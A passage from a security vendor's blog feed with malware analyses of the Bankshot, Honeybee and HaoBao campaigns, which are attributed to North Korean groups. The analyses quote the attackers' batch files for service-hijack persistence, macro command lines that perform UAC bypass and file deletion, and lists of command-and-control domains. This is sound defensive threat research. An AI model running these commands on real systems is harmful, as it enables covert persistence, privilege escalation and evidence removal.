  • Process discovery: implants can list processes running on the system
  • System time discovery: part of the data reconnaissance method, the system time is also sent to the control server
  • File deletion: malware can wipe files indicated by the attacker

IP addresses

  • 203.131.222.83
  • 14.140.116.172
  • 203.131.222.109

Hashes

  • fe887fcab66d7d7f79f05e0266c0649f0114ba7c
  • 8f2918c721511536d8c72144eabaf685ddc21a35
  • 33ffbc8d6850794fa3b7bccb7b1aa1289e6eaa45 

The post Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/feed/ 0
Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/#respond Thu, 08 Mar 2018 14:00:32 +0000 https://securingtomorrow.mcafee.com/?p=85095 This post was prepared with contributions from Asheer Malhotra, Charles Crawford, and Jessica Saavedra-Morales.  On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial […]

The post Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant appeared first on McAfee Blogs.

]]>
This post was prepared with contributions from Asheer Malhotra, Charles Crawford, and Jessica Saavedra-Morales. 

On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial system. Based on the code similarity, the victim’s business sector, and the presence of control server strings, this attack resembles previous attacks by Hidden Cobra conducted against the global financial network SWIFT.

In this new, aggressive campaign we see a return of the Bankshot implant, which last appeared in 2017. Bankshot is designed to persist on a victim’s network for further exploitation; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations.

Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.

the Further investigation into this campaign and analysis of McAfee product telemetry shows that the infection occurred on March 2 and 3. The implant’s first target was a major government-controlled financial organization. It next appeared in another Turkish government organization involved in finance and trade. A further three large financial institutions in Turkey were victims of this attack. The implant has so far not surfaced in any other sector or country. This campaign suggests the attackers may plan a future heist against these targets by using Bankshot to gather information.

Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain falcancoin.io was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017.

Bankshot implants hosted on falcancoin.io.

The Bankshot implant is attached to a malicious Word document with the filename Agreement.docx. The document appears to be an agreement template for Bitcoin distribution between an unknown individual in Paris and a to-be-determined cryptocurrency exchange. The author of this document is test-pc. It was created February 26 and was submitted from the Netherlands. The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io.

We discovered two more documents, written in Korean, that exploit the same vulnerability as Agreement.docx. These documents appear to be part of the same campaign and may have been used on different targets. These documents also communicated with falcancoin.io to install Bankshot and also contain themes around cryptocurrency security.

Two Flash files exploit CVE-2018-4878.

  • 843c17b06a3aee22447f021307909890b68828b9 (February 25)
  • 343ebca579bb888eb8ccb811f9b52280c72e484c (February 25
Malicious documents in the attack.

 

Malicious document exploiting CVE-2018-4878.

The implants are downloaded via a Flash file embedded in the malicious document. They are executed when the victim views the document.

The malicious site falcancoin.io embedded in the Flash file.
Implant directory contained in the malicious Flash file.

The implants (DLLs) are disguised as ZIP files and communicate with three control servers, two of them Chinese-language online gambling sites. These URLs can be found hardcoded in the implants’ code.

Hardcoded control server URLs.

 

Analyzing Bankshot

The sample (a2e966edee45b30bb6bb5c978e55833eec169098) is a Windows DLL that serves as a backdoor and contains a variety of capabilities. The malicious DLL is not a service DLL because it lacks ServiceMain(). To mask itself, it can run as a regular library loaded into a legitimate process.

The malware begins by creating a new thread from the DllMain() function to carry out its malicious activities:

New thread created in the malware’s DllMain() function.

The malware performs the following activities:

  • Builds imports by dynamically loading APIs
  • Decrypts strings needed for control server communications
  • Performs control server communications
  • Handles commands issued by the control server
  • Uninstalls self from the system

The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress(). APIs from the following libraries are loaded at runtime:

  • Kernel32.dll
  • Ws2_32/wsock32.dll
  • Apvapi32.dll
  • Oleaut32.dll
  • Iphlp.dll
  • Urlmon.dll
A dynamic API loaded by the malware.

 

Based on packet capture analysis of previous implants from 2017, the following strings are used in control server communications:

  • Connection: keep-alive
  • Cache-Control: max-age=0
  • Accept: */*
  • Content-Type: multipart/form-data; boundary=
  • Content-Type: application/octet-stream
  • Accept-Encoding: gzip,deflate,sdch
  • Accept-Language: ko-KR -> Korean
  • Content-Disposition: form-data;name=”board_id”
  • Content-Disposition: form-data;name=”user_id”
  • Content-Disposition: form-data;name=”file1″; filename=”img01_29.jpg”
  • Content-Disposition: form-data;name=”file1″; filename=”my.doc”
  • Content-Disposition: form-data;name=”file1″; filename=”pratice.pdf”
  • Content-Disposition: form-data;name=”file1″; filename=”king.jpg”
  • Content-Disposition: form-data;name=”file1″; filename=”dream.avi”
  • Content-Disposition: form-data;name=”file1″; filename=”hp01.avi”
  • Content-Disposition: form-data;name=”file1″; filename=”star.avi”

User Agents

The implant either fetches the user agent from Internet Explorer (using ObtainUserAgentAsString()) or uses a default user agent specified in the malware binary:

Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36

Control Server Communications

The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data, such as:

------FormBoundary<randomly_generated_characters>
Content-Disposition: form-data; name="board_id"

8306
------FormBoundary<randomly_generated_characters>
Content-Disposition: form-data; name="user_id"

*dJU!*JE&!M@UNQ@
------FormBoundary<randomly_generated_characters>
Content-Disposition: form-data; name="file1"; filename="king.jpg"
Content-Type: application/octet-stream
  • board_id is a four-digit number that may be an identifier for a campaign ID. Based on analysis of previous samples, this is a unique identifier.
  • user_id is a hardcoded value in the malware binary that is sent to the control server. The username appears to be attacker specified and has occurred in 2017 Bankshot samples. This links the previous samples with this unique username.
  • filename is based on static analysis. This looks like a specific beacon to indicate that the malware is ready to receive commands.

The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands:

  • Commands received from the control server are encoded DWORDs
  • After decoding, these DWORDs should be in the range 123459h to 123490h
Malware checking to make sure a received command is in the correct range.

 

The command index calculator and jump to the appropriate command.

 

The command index table and command handler address table. 

Implant Capabilities

Based on the responses received from the control server, the malware can carry out the following malicious tasks:

  • Recursively generate a list of files in a directory and send to the control server
  • Terminate a specific process. The process is identified by the control server sending the PID to the malware.
The capability to terminate a process.
  • Gather network addresses and operating system version
  • Execute arbitrary commands using “cmd.exe /c”
The capability to execute system commands.

 

Spawning arbitrary processes.
  • Create processes
  • Write responses from the control server to a file
  • Send information for all drives
  • Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00*
  • Change the time of a file as specified by the control server
The malware changing the file time.
  • Create a process by impersonating a logged-on user

 

Getting a user token using WTSQueryUserToken.

 

A process created as logged-in user.
  • Gather the process time for all processes
Getting time information for all processes running on the system.
  • Gather domain and account names based on all running processes
Gathering account information from running processes.
  • Read a specified file’s contents and send the data to the control server
  • Write data sent by the control server to an existing file
  • Mark a file to be deleted on reboot
Marking a file for deletion on reboot.
  • Overwrite a file with all zeros and mark it for deletion on reboot
Wiping files with zeros and marking it for deletion on reboot. 
  • Delete files using the DeleteFile() API
  • Load an arbitrary library into its process space. This may be used to load additional downloaded components of the attack.
Loading an arbitrary library into its own process space. 

After every action is performed the malware sends a response to the control server indicating whether the action was successful.

Connections

The US government reports that Bankshot is used by Hidden Cobra to target multiple industries including financial organizations. This implant has been connected to a major Korean bank attack and is also known as Trojan Manuscript. That variant contained the capability to search for hosts related to the SWIFT network and the same control server strings as the variant we found targeting the Turkish financial sector. The implant does not conduct financial transactions; rather it is a channel into the victim’s environment, in which further stages of implants can be deployed for financial reconnaissance. The Bankshot implant was also observed in 2017 in documents appearing to come from Latin American banks.

Malicious document delivering the Bankshot implant in 2017.

These connections, combined with the implant’s nearly identical appearance to known variants, are a strong indication that we have uncovered a Hidden Cobra attack. Further, previous implants from 2017 contained bogus documents with financially themed content.

A code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017). 

Conclusion

We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries). In this campaign, we see the adoption of a recent zero-day Adobe Flash vulnerability to get the implant onto the victim’s systems.

The campaign has a high chance of success against victims who have an unpatched version of Flash. Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal. This is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017.

McAfee detects these threats as:

  • RDN/Generic Exploit
  • RDN/Generic.dx
  • Generic PWS.y
  • Generic.hbg
  • Exploit-CVE2018-4878

McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk.

 

Indicators of Compromise

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Commonly used port
  • Command-line interface
  • Service execution
  • Automated collection
  • Data from local system
  • Process discovery
  • System time discovery
  • Credential dumping
  • Exploitation of vulnerability
  • Process injection
  • File deletion

Hashes

  • 650b7d25f4ed87490f8467eb48e0443fb244a8c4
  • 65e7d2338735ec04fd9692d020298e5a7953fd8d
  • 166e8c643a4db0df6ffd6e3ab536b3de9edc9fb7
  • a2e966edee45b30bb6bb5c978e55833eec169098

Domains

  • 530hr[dot]com/data/common.php
  • 028xmz[dot]com/include/common.php
  • 168wangpi[dot]com/include/charset.php
  • Falcancoin[dot]io

 

The post Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/feed/ 0
McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/#respond Fri, 02 Mar 2018 13:00:10 +0000 https://securingtomorrow.mcafee.com/?p=84860 This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.  McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the […]

The post McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups appeared first on McAfee Blogs.

]]>
This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra. 

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks.

Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them.

The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

Background

On January 15, Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor. The Korean-language Word document manual.doc appeared in Vietnam on January 17, with the original author name of Honeybee.

Document properties.

This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen this in previous operations using SYSCON. This key was also used in the Honeybee campaign and appears to have been used since August 2017.

Examples of decoy documents.

Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code and author name as Honeybee. Some of the malicious documents were test files without the implant. From our analysis, most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content.

We also observed a related malicious document created January 12 by the author Windows User that contained a different encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee documents. This document, “International Federation of Red Cross and Red Crescent Societies – DPRK Country Office,” drops an implant with the control server address 1113427185.ifastnet.org, which resolves to the same server used by the implants dropped in the Honeybee case.

The directory contents of control server 1113427185.ifastnet.org.

The directory contents of ftp.byethost11.com, from Honeybee samples.

 

Log files of compromised machines from February 2018 Honeybee samples.

MaoCheng Dropper

Aside from finding the malicious documents, the Advanced Threat Research team discovered a Win32-based executable dropper. This dropper uses a stolen digital signature from Adobe Systems. This certificate is also used by another Korean-language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting program database (PDB) path.

D:\Task\DDE Attack\MaoCheng\Release\Dropper.pdb

The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same type of malware as observed with the other Word documents. This sample also dropped a decoy document with the author name Honeybee. This sample, however, contained a bug that interfered with the execution flow of the dropper, suggesting that the authors did not test the malware after code signing it.

The decoy document uses the cloud-based accounting software company Xero as a lure:

A decoy document from MaoCheng dropper.

Possible Operator

The Advanced Threat Research team has identified the following persona (snoopykiller@mail.ru) tied to this recent operation. Based on our analysis, the actor registered two free hosting accounts: navermail.byethost3.com, which refers to the popular South Korean search engine, and nihon.byethost11.com. The email address was used to register a free account for a control server in all the implants described in our analysis. 

Technical Analysis

Let’s start with an overview of the attack:

We continue with the components involved in this operation.

The malicious Word file is the beginning of the infection chain and acts as a dropper for two DLL files. The Word file contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document_Open() autoload function. The word file also contains a Base64-encoded file (encoded with a custom key) in it that is read, decoded, and dropped to the disk by the macro.

The Document_Open() subroutine implementing the malicious functionality.

The Visual Basic macro performs the following tasks:

  • Opens a handle to the malicious document to read the encoded CAB file
  • Decodes the CAB file and writes it to the disk at %temp%\setup.cab

Encoded CAB file in the Word document.

Decoding and writing the CAB file to %temp%.

The decoded CAB file in the Visual Basic memory buffer.

The CAB file contains the following files and functions:

  • dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass). The DLL contains the following PDB path: D:\Task\MiMul\NTWDBLIB\Release\NTWDBLIB.pdb.
  • bat: A batch file to set up the service COMSysApp, for an x64 system
  • bat: A batch file to set up the service COMSysApp, for an x86 system
  • ini: A data file with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini file.

Decoded credential data contained in ipnet.ini. 

  • dll: The malicious DLL file run as a service (using svchost.exe). The DLL contains the following PDB path: D:\Task\MiMul\FTPCom_vs10\Release\Engine.pdb.
  • The macro then extracts the CAB file into %systemroo%\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts
  • Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections)
  • Command lines used by the Visual Basic macro:
cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe
cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe

A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows. UAC bypass via DLL hijacking requires:

  • A Windows executable with the auto-elevate property in its manifest
  • A Windows executable in a secure directory (%systemroot%\system32)

The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\system32):

NTWDBLIB executing the installer batch files under the context of cliconfg.exe. 

The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86):

install1.bat (x64)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\SysWOW64\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\SysWOW64\install2.bat
del /f /q %windir%\SysWOW64\install1.bat

install2.bat (x86)

@echo off
sc stop COMSysApp
sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\ipnet.dll" /f
sc start COMSysApp
del /f /q %windir%\System32\install1.bat
del /f /q %windir%\System32\install2.bat

The batch files perform these tasks:

  • Stop the service COMSysApp
  • Configure the service to autostart (to set up persistence on the system)
  • Modify registry keys to launch the DLL unser svchost.exe
  • Specify the malicious DLL path to be loaded into the svchost process.
  • Immediately restart the service
  • Remove the batch files to reduce the fingerprint on the system 

IPNet.dll runs as a service under svchost.exe.

The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using:

cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

All the following capabilities described are implemented by the malicious service DLL implant unless specified.  

Variant using North Korean Red Cross

Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key. This document was created January 10.

Contents of the decoy document.

This variant also consists of two CAB files that are dropped to %temp%, depending on the OS (x86 or x64).

The key differences in this variant:

  • Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file
  • There is one CAB file for an x86 system and another for an x64 system
  • This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass
    • exe is the program vulnerable to the UAC bypass attack
    • dll runs install.bat to set up the service (same as NTWDBLIB.dll)
  • exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.
  • The Visual Basic macro uses the following command line:
cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe
  • The control server credential information contained in the CAB files is different:

Decoded credential data contained in another ipnet.ini.

Similarities between this variant and the original malware sample:

  • Service name is the same: COMSysApp
  • The DLL and ini files contain the same functions as described elsewhere in this post

Data Reconnaissance

The following information is gathered from the endpoint and sent to the control server.

  • System info:
    • Computer name
    • System info using: cmd /c systeminfo >%temp%\temp.ini
    • List of currently running process using: cmd /c tasklist >%temp%\temp.ini

Exfiltration

  • The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern:

From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (01-04 11-40-02).txt

  • All the text files are now packed into the archive temp.zip (%temp%\temp.zip)
  • zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt
  • txt is uploaded to the control server

Additional Commands and Capabilities

The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords:

  • TO EVERYONE: Commands issued to all infected endpoints
  • TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName

The following commands are supported by the malware implant:

  • cmd /c pull <filename>: Adds filename to temp.zip, Base64 encodes, and uploads to control server
  • cmd /c chip <string>: Deletes current ipnet.ini config file. Writes new config info (control server connection info) to new ipnet.ini.
  • cmd /c put <new_file_name> <existing_file_name>: Copies existing file to new file name. Deletes existing file.
  • /user <parameters>: Executes downloaded file with parameters specified using CreateProcessAsUser
  • cmd /c <command>: Executes command on infected endpoint 

Conclusion 

The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor is likely a Korean speaker.

The techniques used in the malicious documents such as the lure messages closely resemble what we have observed before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean affairs. We have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada.

Based on the McAfee Advanced Threat Research team’s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor. Some new droppers have not been observed before in the wild. The MaoCheng dropper was apparently created specifically for this operation and appeared only twice in the wild.

 

Indicators of compromise

MITRE ATT&CK techniques

  • Modify existing service
  • Code signing
  • File deletion
  • Deobfuscate/decode files or information
  • System information discovery
  • Process discovery
  • Service execution
  • RunDLL32
  • Scripting
  • Command-line Interface
  • Data from local system
  • Automated exfiltration
  • Data encrypted
  • Commonly used port
  • Bypass user account control

Hashes

  • fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3
  • f684e15dd2e84bac49ea9b89f9b2646dc32a2477
  • 1d280a77595a2d2bbd36b9b5d958f99be20f8e06
  • 19d9573f0b2c2100accd562cc82d57adb12a57ec
  • f90a2155ac492c3c2d5e1d83e384e1a734e59cc0
  • 9b832dda912cce6b23da8abf3881fcf4d2b7ce09
  • f3b62fea38cb44e15984d941445d24e6b309bc7b
  • 66d2cea01b46c3353f4339a986a97b24ed89ee18
  • 7113aaab61cacb6086c5531a453adf82ca7e7d03
  • d41daba0ebfa55d0c769ccfc03dbf6a5221e006a
  • 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c
  • 35ab747c15c20da29a14e8b46c07c0448cef4999
  • e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42
  • 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0
  • bca861a46d60831a3101c50f80a6d626fa99bf16
  • 01530adb3f947fabebae5d9c04fb69f9000c3cef
  • 4229896d61a5ad57ed5c247228606ce62c7032d0
  • 4c7e975f95ebc47423923b855a7530af52977f57
  • 5a6ad7a1c566204a92dd269312d1156d51e61dc4
  • 1dc50bfcab2bc80587ac900c03e23afcbe243f64
  • 003e21b02be3248ff72cc2bfcd05bb161b6a2356
  • 9b7c3c48bcef6330e3086de592b3223eb198744a
  • 85e2453b37602429596c9681a8c58a5c6faf8d0c

Domains

  • ftp.byethost31.com
  • ftp.byethost11.com
  • 1113427185.ifastnet.org
  • navermail.byethost3.com
  • nihon.byethost3.com

The post McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/feed/ 0
Lazarus Resurfaces, Targets Global Banks and Bitcoin Users https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#respond Mon, 12 Feb 2018 15:30:32 +0000 https://securingtomorrow.mcafee.com/?p=84373 McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

]]>
This blog was written with support and contributions provided by Asheer Maholtra, Jessica Saavedra Morales, and Thomas Roccia.

McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

This new campaign, dubbed HaoBao, resumes Lazarus’ previous phishing emails, posed as employee recruitment, but now targets Bitcoin users and global financial organizations. When victims open malicious documents attached to the emails, the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering.

HaoBao targets and never-before-seen implants signal to McAfee ATR an ambitious campaign by Lazarus to establish cryptocurrency cybercrime at a sophisticated level.

Background

Beginning in 2017, the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents. The campaign lasted from April to October and used job descriptions relevant to target organizations, in both English and Korean language. The objective was to gain access to the target’s environment and obtain key military program insight or steal money. The 2017 campaign targets ranged from defense contractors to financial institutions, including crypto currency exchanges, however; much of this fake job recruitment activity ceased months later, with the last activity observed October 22, 2017.

Analysis

On January 15th , McAfee ATR discovered a malicious document masquerading as a job recruitment for a Business Development Executive located in Hong Kong for a large multi-national bank. The document was distributed via a Dropbox account at the following URL:

hxxps://www.dropbox.com/s/qje0yrz03au66d0/JobDescription.doc?dl=1

This is the mark of a new campaign, though it utilizes techniques, tactics and procedures observed in 2017. This document had the last author ‘Windows User’ and was created January 16, 2018 with Korean language resources. Several additional malicious documents with the same author appeared between January 16 though January 24, 2018.

Document summary from Virus Total

 

Malicious job recruitment documents


Victims are persuaded to enable content through a notification claiming the document was created in an earlier version of Microsoft Word. The malicious documents then launch an implant on the victim’s system via a Visual Basic macro.

Malicious Microsoft Word document

 

Implants dropped in campaign

The document (7e70793c1ca82006775a0cac2bd75cc9ada37d7c) created January 24, 2018 drops and executes an implant compiled January 22, 2018 with the name lsm.exe (535f212b320df049ae8b8ebe0a4f93e3bd25ed79). The implant lsm.exe contacted 210.122.7.129 which also resolves to worker.co.kr.Implants dropped in campaign

The other malicious document ( a79488b114f57bd3d8a7fa29e7647e2281ce21f6) created January 19, 2018 drops the implant (afb2595ce1ecf0fdb9631752e32f0e32be3d51bb); which is 99% similar-to the lsm.exe implant.

This document was distributed from the following Dropbox URLs:

  • hxxps://dl.dropboxusercontent.com/content_link/AKqqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1
HTTP response for job description document

This implant (csrss.exe) compiled January 15, 2018 contacts an IP address 70.42.52.80 which resolves to deltaemis.com. We identified that this domain was used to host a malicious document from a previous 2017 campaign targeting the Sikorsky program.

  • hxxp://deltaemis.com/CRCForm/3E_Company/Sikorsky/E4174/JobDescription.doc

A third malicious document (dc06b737ce6ada23b4d179d81dc7d910a7dbfdde) created January 19, 2018 drops e8faa68daf62fbe2e10b3bac775cce5a3bb2999e which is compiled January 15, 2018. This implant communicates to a South Korean IP address 221.164.168.185 which resolves to palgong-cc.co.kr.

McAfee ATR analysis finds the dropped implants have never been seen before in the wild and have not been used in previous Lazarus campaigns from 2017. Furthermore, this campaign deploys a one-time data gathering implant that relies upon downloading a second stage to gain persistence. The implants contain a hardcoded word “haobao” that is used as a switch when executing from the Visual Basic macro.

Malicious Document Analysis

The malicious document contains two payloads as encrypted string arrays embedded in Visual Basic macro code. The payloads are present as encrypted string arrays that are decrypted in memory, written to disk and launched in sequence (second stage malicious binary launched first and then the decoy document).

The VBA Macro code is self-executing and configured to execute when the OLE document (MS Word doc) is opened (via “Sub AutoOpen()”). The AutoOpen() function in the VBA Macro performs the following tasks in the sequence listed:

  • Decodes the target file path of the second stage binary payload. This file path is calculated based on the current user’s Temp folder location:

<temp_dir_path>\.\lsm.exe

VB code to decrypt second stage filepath
  • Decodes the second stage binary in memory and writes it to the %temp%\.\lsm.exe file location
second stage binary (MZ) as an encrypted String Array in the VBA Macro
second stage binary (MZ) decoded in memory by the VBA Macro
  • After writing the second stage payload to disk the VBA code performs two important actions.
    • Runs the second stage payload using cmd.exe. This is done so that the cmd.exe process exists as soon as the payload is launched. This way a process enumeration tool cannot find the parent process => Smaller footprint.

cmdline for executing the second stage binary:

cmd.exe /c start /b <temp_dir_path>\.\lsm.exe /haobao

  • Adds persistence on the system by creating a shortcut in the user’s Startup folder with the correct cmdline arguments:

Link file command line: <temp_dir_path>\.\lsm.exe /haobao

Link File Name: GoogleUpdate.lnk

Trigger code for executing the second stage binary and establishing persistence

 

LNK file configuration for establishing persistence
  • Once the second stage payload has been launched, the VBA Macro proceeds to display a decoy document to the end user. This decoy document is also stored in the VBA Macro as an encrypted string array (similar to the second stage payload). The decoy document is again written to the user’s temp directory to the following filename/path:

<temp_dir_path>\.\Job Description.doc

Decoy Document decoded in memory by the VBA Macro
  • Once the decoy document has been written to disk, the VBA Macro sets its file attributes to System + Hidden
  • The decoy document is then opened by the malicious VBA Macro and the original malicious document’s caption is copied over to the decoy document to trick the end user into mistaking the decoy document for the original (malicious) document.
  • This activity, combined with the fact that the VBA Macro then closes the current (malicious) document, indicates that the VBA Macro aims to trick an unsuspecting user into thinking that the decoy document currently open is the original (malicious) document opened by the user.
  • Since the decoy document is a benign file and does not contain any macros the victim does not suspect any malicious behavior.

Implant Analysis

As part of the implant initialization activities the implant does the following;

  • Checks the string passed to it through command line
    • “/haobao” in case of 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
    • “/pumpingcore” in case of e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

If the malware does not find this string in its cmdline arguments, it simply quits without going any further.

  • Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information.

